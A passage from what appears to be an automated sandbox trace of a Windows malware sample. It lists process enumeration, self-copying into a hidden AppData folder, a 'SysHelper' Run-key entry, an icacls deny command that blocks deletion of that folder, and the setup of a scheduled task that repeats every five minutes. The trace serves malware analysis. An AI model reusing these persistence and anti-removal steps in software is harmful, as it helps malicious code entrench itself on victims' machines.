lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0063.941] CloseHandle (hObject=0x5c0) returned 1 [0063.941] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb1c) returned 0x5c0 [0063.941] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.943] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x8b0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0063.943] CloseHandle (hObject=0x5c0) returned 1 [0063.943] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb2c) returned 0x5c0 [0063.943] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.945] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1100000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0063.946] CloseHandle (hObject=0x5c0) returned 1 [0063.946] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb3c) returned 0x5c0 [0063.946] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.947] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xfc0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0063.948] CloseHandle (hObject=0x5c0) returned 1 [0063.948] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb4c) returned 0x5c0 [0063.948] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.981] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1360000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0063.981] CloseHandle (hObject=0x5c0) returned 1 [0063.981] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb5c) returned 0x5c0 [0063.981] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.983] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1100000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0063.983] CloseHandle (hObject=0x5c0) returned 1 [0063.983] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb6c) returned 0x5c0 [0063.983] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.984] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1360000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="ecuador.exe") returned 0xb [0063.985] CloseHandle (hObject=0x5c0) returned 1 [0063.985] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb7c) returned 0x5c0 [0063.985] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.986] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xdd0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="string_encouraged_peers.exe") returned 0x1b [0063.986] CloseHandle (hObject=0x5c0) returned 1 [0063.986] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb8c) returned 0x5c0 [0063.987] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.988] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x180000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="statutestevens.exe") returned 0x12 [0063.988] CloseHandle (hObject=0x5c0) returned 1 [0063.988] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb9c) returned 0x5c0 [0063.988] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.990] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x240000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="baptist-lafayette.exe") returned 0x15 [0063.990] CloseHandle (hObject=0x5c0) returned 1 [0063.990] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbac) returned 0x5c0 [0063.990] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.992] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xce0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="summaries.exe") returned 0xd [0063.992] CloseHandle (hObject=0x5c0) returned 1 [0063.992] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbd8) returned 0x0 [0063.992] CloseHandle (hObject=0x0) returned 0 [0063.992] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x85c) returned 0x0 [0063.992] CloseHandle (hObject=0x0) returned 0 [0063.992] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa98) returned 0x5c0 [0063.992] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.994] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x400000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned 0x40 [0063.994] CloseHandle (hObject=0x5c0) returned 1 [0064.003] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x28) returned 0x669ea0 [0064.003] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x25c) returned 0x68eb88 [0064.003] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x25c) returned 0x3341618 [0064.003] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x25c) returned 0x69c388 [0064.003] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x25c) returned 0x69c5f0 [0064.003] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x25c) returned 0x3358550 [0064.003] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x25c) returned 0x33587b8 [0064.003] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x25c) returned 0x334b228 [0064.003] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x25c) returned 0x334b490 [0064.003] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x25c) returned 0x334b6f8 [0064.003] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x25c) returned 0x334b960 [0064.012] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18df70 | out: phkResult=0x18df70*=0x5c0) returned 0x0 [0064.012] RegQueryValueExW (in: hKey=0x5c0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18df6c, lpData=0x18c698, lpcbData=0x18df50*=0x400 | out: lpType=0x18df6c*=0x0, lpData=0x18c698*=0x0, lpcbData=0x18df50*=0x400) returned 0x2 [0064.012] RegCloseKey (hKey=0x5c0) returned 0x0 [0064.012] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0064.012] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0064.013] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" " [0064.013] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" ", pNumArgs=0x18df34 | out: pNumArgs=0x18df34) returned 0x726240*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" [0064.013] lstrcpyW (in: lpString1=0x18be98, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" [0064.013] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned="%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" [0064.013] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d698 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0064.013] UuidCreate (in: Uuid=0x18dee4 | out: Uuid=0x18dee4) returned 0x0 [0064.013] UuidToStringW (in: Uuid=0x18dee4, StringUuid=0x18df78 | out: StringUuid=0x18df78) returned 0x0 [0064.013] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x50) returned 0x3356198 [0064.013] RpcMgmtStatsVectorFree (in: StatsVector=0x18df78 | out: StatsVector=0x18df78) returned 0x0 [0064.013] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="447a37e6-1c63-4f3d-a937-58e1a8c86c2f" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f") returned 1 [0064.013] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f"), lpSecurityAttributes=0x0) returned 1 [0064.014] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xb0) returned 0x334bbe0 [0064.014] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xb0) returned 0x334bc98 [0064.014] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f", pMore="%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned 1 [0064.014] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%localappdata%24fd5b09-6d4d-435f-beb9-3d272f67be2csample.exe.exe")) returned 0 [0064.015] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\%localappdata%24fd5b09-6d4d-435f-beb9-3d272f67be2csample.exe.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%localappdata%24fd5b09-6d4d-435f-beb9-3d272f67be2csample.exe.exe"), bFailIfExists=0) returned 1 [0064.084] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18df74 | out: phkResult=0x18df74*=0x5c4) returned 0x0 [0064.085] lstrcpyW (in: lpString1=0x18ce98, lpString2="\"" | out: lpString1="\"") returned="\"" [0064.085] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" [0064.085] lstrcatW (in: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" --AutoStart") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" --AutoStart" [0064.085] lstrlenW (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" --AutoStart") returned 159 [0064.085] RegSetValueExW (in: hKey=0x5c4, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" --AutoStart", cbData=0x13e | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" --AutoStart") returned 0x0 [0064.085] RegCloseKey (hKey=0x5c4) returned 0x0 [0064.086] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x130) returned 0x331fb00 [0064.086] SetLastError (dwErrCode=0x0) [0064.086] lstrcpyW (in: lpString1=0x18ae98, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0064.086] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f" [0064.086] lstrcatW (in: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0064.086] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18de98*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18def4 | out: lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\447a37e6-1c63-4f3d-a937-58e1a8c86c2f\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18def4*(hProcess=0x5c0, hThread=0x5c4, dwProcessId=0x180, dwThreadId=0x478)) returned 1 [0064.102] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0064.105] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0064.275] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0064.307] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0064.323] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0064.339] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0064.354] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0064.370] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0064.385] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x0 [0064.398] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x334bc98 | out: hHeap=0x640000) returned 1 [0064.398] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3356198 | out: hHeap=0x640000) returned 1 [0064.398] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x130) returned 0x69c858 [0064.398] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x130) returned 0x331cf10 [0064.398] CoInitialize (pvReserved=0x0) returned 0x0 [0064.939] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0064.940] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x130) returned 0x3313aa8 [0064.940] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18df5c | out: ppv=0x18df5c*=0x2a10b00) returned 0x0 [0065.120] TaskScheduler:ITaskService:Connect (This=0x2a10b00, serverName=0x18d9e8*(varType=0x0, wReserved1=0x69, wReserved2=0xc850, wReserved3=0x69, varVal1=0x97, varVal2=0x130), user=0x18d9f8*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x138), domain=0x18da08*(varType=0x0, wReserved1=0x0, wReserved2=0x130, wReserved3=0x0, varVal1=0x97, varVal2=0x7), password=0x18da18*(varType=0x0, wReserved1=0x334, wReserved2=0xdf04, wReserved3=0x18, varVal1=0x420cab, varVal2=0x640000)) returned 0x0 [0065.123] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xc) returned 0x3337818 [0065.123] TaskScheduler:ITaskService:GetFolder (in: This=0x2a10b00, Path="\\", ppFolder=0x18df64 | out: ppFolder=0x18df64*=0x90ff98) returned 0x0 [0065.124] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3337818 | out: hHeap=0x640000) returned 1 [0065.124] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xc) returned 0x3337818 [0065.124] ITaskFolder:DeleteTask (This=0x90ff98, Name="Time Trigger Task", flags=0) returned 0x80070002 [0065.126] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3337818 | out: hHeap=0x640000) returned 1 [0065.126] TaskScheduler:ITaskService:NewTask (in: This=0x2a10b00, flags=0x0, ppDefinition=0x18df68 | out: ppDefinition=0x18df68*=0x2a10b88) returned 0x0 [0065.128] TaskScheduler:IUnknown:Release (This=0x2a10b00) returned 0x1 [0065.128] ITaskDefinition:get_RegistrationInfo (in: This=0x2a10b88, ppRegistrationInfo=0x18df3c | out: ppRegistrationInfo=0x18df3c*=0x2a10c48) returned 0x0 [0065.128] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xc) returned 0x3337848 [0065.129] IRegistrationInfo:put_Author (This=0x2a10c48, Author="Author Name") returned 0x0 [0065.129] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3337848 | out: hHeap=0x640000) returned 1 [0065.129] IUnknown:Release (This=0x2a10c48) returned 0x1 [0065.129] ITaskDefinition:get_Principal (in: This=0x2a10b88, ppPrincipal=0x18df44 | out: ppPrincipal=0x18df44*=0x2a10dd8) returned 0x0 [0065.129] IPrincipal:put_LogonType (This=0x2a10dd8, LogonType=3) returned 0x0 [0065.129] IUnknown:Release (This=0x2a10dd8) returned 0x1 [0065.129] ITaskDefinition:get_Settings (in: This=0x2a10b88, ppSettings=0x18df4c | out: ppSettings=0x18df4c*=0x2a10cf8) returned 0x0 [0065.129] ITaskSettings:put_StartWhenAvailable (This=0x2a10cf8, StartWhenAvailable=1) returned 0x0 [0065.129] IUnknown:Release (This=0x2a10cf8) returned 0x1 [0065.129] ITaskSettings:get_IdleSettings (in: This=0x2a10cf8, ppIdleSettings=0x18df30 | out: ppIdleSettings=0x18df30*=0x2a10d68) returned 0x0 [0065.130] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xc) returned 0x3337848 [0065.130] IIdleSettings:put_WaitTimeout (This=0x2a10d68, WaitTimeout="PT5M") returned 0x0 [0065.130] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3337848 | out: hHeap=0x640000) returned 1 [0065.130] IUnknown:Release (This=0x2a10d68) returned 0x1 [0065.130] ITaskDefinition:get_Triggers (in: This=0x2a10b88, ppTriggers=0x18df2c | out: ppTriggers=0x18df2c*=0x2a10cb8) returned 0x0 [0065.130] ITriggerCollection:Create (in: This=0x2a10cb8, Type=1, ppTrigger=0x18df38 | out: ppTrigger=0x18df38*=0x2a10e38) returned 0x0 [0065.130] IUnknown:Release (This=0x2a10cb8) returned 0x1 [0065.130] IUnknown:QueryInterface (in: This=0x2a10e38, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18df54 | out: ppvObject=0x18df54*=0x2a10e38) returned 0x0 [0065.130] IUnknown:Release (This=0x2a10e38) returned 0x2 [0065.131] ITrigger:get_Repetition (in: This=0x2a10e38, ppRepeat=0x18df40 | out: ppRepeat=0x18df40*=0x2a10e88) returned 0x0 [0065.131] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xc) returned 0x3337848 [0065.131] IRepetitionPattern:put_Interval (This=0x2a10e88, Interval="PT5M") returned 0x0 [0065.131] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3337848 | out: hHeap=0x640000) returned 1 [0065.131] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xc) returned 0x3337848 [0065.131] IRepetitionPattern:put_Duration (This=0x2a10e88, Duration="") returned 0x0 [0065.132] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3337848 | out: hHeap=0x640000) returned 1 [0065.133] ITrigger:put_Repetition (This=0x2a10e38, Repetition=0x2a10e88) returned 0x0 [0065.133] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xc) returned 0x3337848 [0065.133] ITrigger:put_Id (This=0x2a10e38, Id="Trigger1") returned 0x0 [0065.134] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3337848 | out: hHeap=0x640000) returned 1 [0065.134] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xc) returned 0x3337848 [0065.134] ITrigger:put_EndBoundary (This=0x2a10e38, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0065.134] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3337848 | out: hHeap=0x640000) returned 1 [0065.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18da14 | out: lpSystemTimeAsFileTime=0x18da14*(dwLowDateTime=0x971e4b60, dwHighDateTime=0x1d5d6b4)) [0065.142] GetLastError () returned 0x0 [0065.151] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x24) returned 0x3380e78 [0065.159] GetLastError () returned 0x0 [0065.160] GetLastError () returned 0x0 [0065.160] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0065.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d97c | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d97c) returned 26 [0065.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d97c | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d97c) returned 26 [0065.216] GetLastError () returned 0x0 [0065.217] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x24) returned 0x3380cf8 [0065.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x3380cf8, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0065.217] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0xa0) returned 0x6b6b10 [0065.217] GetLastError () returned 0x0 [0065.217] ITrigger:put_StartBoundary (This=0x2a10e38, StartBoundary="2020-01-30T02:00:19") returned 0x0 [0065.217] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3337848 | out: hHeap=0x640000) returned 1 [0065.217] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x338cfe0 | out: hHeap=0x640000) returned 1 [0065.217] IUnknown:Release (This=0x2a10e38) returned 0x1 [0065.217] ITaskDefinition:get_Actions (in: This=0x2a10b88, ppActions=0x18df48 | out: 